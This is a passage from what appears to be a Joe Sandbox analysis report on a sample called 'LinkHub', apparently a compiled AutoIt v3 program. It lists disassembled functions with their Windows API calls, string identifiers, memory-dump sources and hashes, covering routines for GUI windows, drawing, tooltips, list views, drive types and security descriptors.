                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: d62e6a52e18fff53e9965617f1947c4358a5c363ac066135c09551d0b6cc4b51
                                                                    • Instruction ID: c7905ac02c528e6eb59e01ecdf142bd0b899058768422c674d28662dcc91a8cd
                                                                    • Opcode Fuzzy Hash: d62e6a52e18fff53e9965617f1947c4358a5c363ac066135c09551d0b6cc4b51
                                                                    • Instruction Fuzzy Hash:
                                                                    Function 00CF353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00CF358D
                                                                    • DeleteObject.GDI32(00000000), ref: 00CF35A0
                                                                    • DestroyWindow.USER32 ref: 00CF35AF
                                                                    • GetDesktopWindow.USER32 ref: 00CF35CA
                                                                    • GetWindowRect.USER32(00000000), ref: 00CF35D1
                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00CF3700
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00CF370E
                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF3755
                                                                    • GetClientRect.USER32(00000000,?), ref: 00CF3761
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CF379D
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF37BF
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF37D2
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF37DD
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00CF37E6
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF37F5
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00CF37FE
                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF3805
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00CF3810
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF3822
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00D10C04,00000000), ref: 00CF3838
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00CF3848
                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00CF386E
                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00CF388D
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF38AF
                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF3A9C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 2211948467-2373415609
                                                                    • Opcode ID: 661914facb60965a4e483d11c89db693cde2875b0a006db9acc84d48d677dc18
                                                                    • Instruction ID: 795c6525a7c6b1a0f9fe77cd95a100624a1991b253381b615796e05fef94168d
                                                                    • Opcode Fuzzy Hash: 661914facb60965a4e483d11c89db693cde2875b0a006db9acc84d48d677dc18
                                                                    • Instruction Fuzzy Hash: C4026175500209AFDB14DFA5CD89EAE7BB9FF49310F048159FA19DB2A0CB74AE01CB61
                                                                    Function 00D07B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00D07B67
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00D07B98
                                                                    • GetSysColor.USER32(0000000F), ref: 00D07BA4
                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00D07BBE
                                                                    • SelectObject.GDI32(?,?), ref: 00D07BCD
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00D07BF8
                                                                    • GetSysColor.USER32(00000010), ref: 00D07C00
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00D07C07
                                                                    • FrameRect.USER32(?,?,00000000), ref: 00D07C16
                                                                    • DeleteObject.GDI32(00000000), ref: 00D07C1D
                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00D07C68
                                                                    • FillRect.USER32(?,?,?), ref: 00D07C9A
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D07CBC
                                                                      • Part of subcall function 00D07E22: GetSysColor.USER32(00000012), ref: 00D07E5B
                                                                      • Part of subcall function 00D07E22: SetTextColor.GDI32(?,00D07B2D), ref: 00D07E5F
                                                                      • Part of subcall function 00D07E22: GetSysColorBrush.USER32(0000000F), ref: 00D07E75
                                                                      • Part of subcall function 00D07E22: GetSysColor.USER32(0000000F), ref: 00D07E80
                                                                      • Part of subcall function 00D07E22: GetSysColor.USER32(00000011), ref: 00D07E9D
                                                                      • Part of subcall function 00D07E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D07EAB
                                                                      • Part of subcall function 00D07E22: SelectObject.GDI32(?,00000000), ref: 00D07EBC
                                                                      • Part of subcall function 00D07E22: SetBkColor.GDI32(?,?), ref: 00D07EC5
                                                                      • Part of subcall function 00D07E22: SelectObject.GDI32(?,?), ref: 00D07ED2
                                                                      • Part of subcall function 00D07E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00D07EF1
                                                                      • Part of subcall function 00D07E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D07F08
                                                                      • Part of subcall function 00D07E22: GetWindowLongW.USER32(?,000000F0), ref: 00D07F15
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                    • String ID:
                                                                    • API String ID: 4124339563-0
                                                                    • Opcode ID: 972ad3e40bb52f2153e71da2f9944e9a4f8a09298df4ea34aaaf2b5403cc68f7
                                                                    • Instruction ID: 346193d93095c9b432b452f0086ca88c2feb72a6174ed30cc145caf6e111ee04
                                                                    • Opcode Fuzzy Hash: 972ad3e40bb52f2153e71da2f9944e9a4f8a09298df4ea34aaaf2b5403cc68f7
                                                                    • Instruction Fuzzy Hash: AAA16171408301AFD7119FA4DC48B6B7BAAFF49324F140A1AF96AD62E0D771E944CB62
                                                                    Function 00C71625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?), ref: 00C716B4
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00CB2B07
                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00CB2B40
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00CB2F85
                                                                      • Part of subcall function 00C71802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C71488,?,00000000,?,?,?,?,00C7145A,00000000,?), ref: 00C71865
                                                                    • SendMessageW.USER32(?,00001053), ref: 00CB2FC1
                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00CB2FD8
                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00CB2FEE
                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00CB2FF9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                    • String ID: 0
                                                                    • API String ID: 2760611726-4108050209
                                                                    • Opcode ID: 794738126b6fb7a85fdea3c2286c1b8a20fd495e2577472c42462981d7afa79c
                                                                    • Instruction ID: ddc9fc2573724ca56102622d94cc347efd76a94b8027203ec3184f27a48eecba
                                                                    • Opcode Fuzzy Hash: 794738126b6fb7a85fdea3c2286c1b8a20fd495e2577472c42462981d7afa79c
                                                                    • Instruction Fuzzy Hash: 861290342002519FD725DF18C884BB9BBE6FB45301F588569F8A9DB261C731EE82DFA1
                                                                    Function 00CF316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000), ref: 00CF319B
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CF32C7
                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00CF3306
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00CF3316
                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00CF335D
                                                                    • GetClientRect.USER32(00000000,?), ref: 00CF3369
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00CF33B2
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CF33C1
                                                                    • GetStockObject.GDI32(00000011), ref: 00CF33D1
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00CF33D5
                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00CF33E5
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CF33EE
                                                                    • DeleteDC.GDI32(00000000), ref: 00CF33F7
                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CF3423
                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00CF343A
                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00CF347A
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CF348E
                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00CF349F
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00CF34D4
                                                                    • GetStockObject.GDI32(00000011), ref: 00CF34DF
                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CF34EA
                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00CF34F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                    • API String ID: 2910397461-517079104
                                                                    • Opcode ID: 8292afa26b5f2a4a389e7694989127dc2362b985d80f8a734c70d274307e1d1e
                                                                    • Instruction ID: 85184d2de2b5d4b5538c0ee91436e46e1bb2047e6a0d25e5db3f441115667df7
                                                                    • Opcode Fuzzy Hash: 8292afa26b5f2a4a389e7694989127dc2362b985d80f8a734c70d274307e1d1e
                                                                    • Instruction Fuzzy Hash: BEB14F75A40209BFEB14DFA8CC49FAE7BB9EB48710F008119FA15E7291DB74AD40CB64
                                                                    Function 00CE5524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00CE5532
                                                                    • GetDriveTypeW.KERNEL32(?,00D0DC30,?,\\.\,00D0DCD0), ref: 00CE560F
                                                                    • SetErrorMode.KERNEL32(00000000,00D0DC30,?,\\.\,00D0DCD0), ref: 00CE577B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DriveType
                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                    • API String ID: 2907320926-4222207086
                                                                    • Opcode ID: 7bbbb75b0d343ccd93ed26561867e3249bdc91a755ec8419d5dd74c3df1850ac
                                                                    • Instruction ID: 2cd87afa9dbe1446afba8f5141d742cdf0947a1563973788b90e34298f59f39f
                                                                    • Opcode Fuzzy Hash: 7bbbb75b0d343ccd93ed26561867e3249bdc91a755ec8419d5dd74c3df1850ac
                                                                    • Instruction Fuzzy Hash: DA61F270A08E85DFC734DF26C9919B873A1EF14358F248016F41AAB391C771DE95EB61
                                                                    Function 00D01A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 00D01BC4
                                                                    • GetDesktopWindow.USER32 ref: 00D01BD9
                                                                    • GetWindowRect.USER32(00000000), ref: 00D01BE0
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D01C35
                                                                    • DestroyWindow.USER32(?), ref: 00D01C55
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00D01C89
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D01CA7
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00D01CB9
                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00D01CCE
                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00D01CE1
                                                                    • IsWindowVisible.USER32(00000000), ref: 00D01D3D
                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00D01D58
                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00D01D6C
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00D01D84
                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00D01DAA
                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00D01DC4
                                                                    • CopyRect.USER32(?,?), ref: 00D01DDB
                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00D01E46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                    • String ID: ($0$tooltips_class32
                                                                    • API String ID: 698492251-4156429822
                                                                    • Opcode ID: 59b6e4c8df1b25f90d860d7330f3397b37400ad8d50e4affda67490351aef082
                                                                    • Instruction ID: 3cd19a078c6fd869738d14c7bd967f566e041df7564fe7d62f47249c9fc38753
                                                                    • Opcode Fuzzy Hash: 59b6e4c8df1b25f90d860d7330f3397b37400ad8d50e4affda67490351aef082
                                                                    • Instruction Fuzzy Hash: C5B16671604301AFD714DF68C884B6ABBE5FF84314F04891DF99D9B2A1CB31E844CBA6
                                                                    Function 00D00CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00D00D81
                                                                    • _wcslen.LIBCMT ref: 00D00DBB
                                                                    • _wcslen.LIBCMT ref: 00D00E25
                                                                    • _wcslen.LIBCMT ref: 00D00E8D
                                                                    • _wcslen.LIBCMT ref: 00D00F11
                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00D00F61
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D00FA0
                                                                      • Part of subcall function 00C8FD52: _wcslen.LIBCMT ref: 00C8FD5D
                                                                      • Part of subcall function 00CD2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CD2BA5
                                                                      • Part of subcall function 00CD2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CD2BD7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                    • API String ID: 1103490817-719923060
                                                                    • Opcode ID: a7f197718d6a4e812a58f4b37b3f6f4ee4024c5f8457b1f546132f78892710ed
                                                                    • Instruction ID: 85096dc6bfd5dd5a24be4cbe6cb1f19f52b32aca92dd8cc99b64f515c312bf91
                                                                    • Opcode Fuzzy Hash: a7f197718d6a4e812a58f4b37b3f6f4ee4024c5f8457b1f546132f78892710ed
                                                                    • Instruction Fuzzy Hash: 4EE1CD352083419FC714DF24C990A2AB7E2BF98314F18896DF49A9B3E1DB30ED45DB62
                                                                    Function 00C72521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C725F8
                                                                    • GetSystemMetrics.USER32(00000007), ref: 00C72600
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C7262B
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00C72633
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00C72658
                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C72675
                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C72685
                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C726B8
                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C726CC
                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00C726EA
                                                                    • GetStockObject.GDI32(00000011), ref: 00C72706
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C72711
                                                                      • Part of subcall function 00C719CD: GetCursorPos.USER32(?), ref: 00C719E1
                                                                      • Part of subcall function 00C719CD: ScreenToClient.USER32(00000000,?), ref: 00C719FE
                                                                      • Part of subcall function 00C719CD: GetAsyncKeyState.USER32(00000001), ref: 00C71A23
                                                                      • Part of subcall function 00C719CD: GetAsyncKeyState.USER32(00000002), ref: 00C71A3D
                                                                    • SetTimer.USER32(00000000,00000000,00000028,00C7199C), ref: 00C72738
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                    • String ID: AutoIt v3 GUI
                                                                    • API String ID: 1458621304-248962490
                                                                    • Opcode ID: 246a3eb0f4c495708dd3e9dbaf961fa8c6d66efe0d5ab239cd80d10c7adfaad1
                                                                    • Instruction ID: 7522b1920407b1ef6090733e188421c5af450aaa13bcb06c179e6f6369bbce4c
                                                                    • Opcode Fuzzy Hash: 246a3eb0f4c495708dd3e9dbaf961fa8c6d66efe0d5ab239cd80d10c7adfaad1
                                                                    • Instruction Fuzzy Hash: EAB13B35A40209AFDB14DFA8CC49BAE7BB5FB48314F10821AFA59E7290D774E941CF61
                                                                    Function 00CD16D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CD1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CD1A60
                                                                      • Part of subcall function 00CD1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A6C
                                                                      • Part of subcall function 00CD1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A7B
                                                                      • Part of subcall function 00CD1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A82
                                                                      • Part of subcall function 00CD1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CD1A99
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CD1741
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CD1775
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00CD178C
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00CD17C6
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CD17E2
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00CD17F9
                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00CD1801
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00CD1808
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CD1829
                                                                    • CopySid.ADVAPI32(00000000), ref: 00CD1830
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CD185F
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CD1881
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CD1893
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CD18BA
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD18C1
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CD18CA
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD18D1
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CD18DA
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD18E1
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00CD18ED
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD18F4
                                                                      • Part of subcall function 00CD1ADF: GetProcessHeap.KERNEL32(00000008,00CD14FD,?,00000000,?,00CD14FD,?), ref: 00CD1AED
                                                                      • Part of subcall function 00CD1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00CD14FD,?), ref: 00CD1AF4
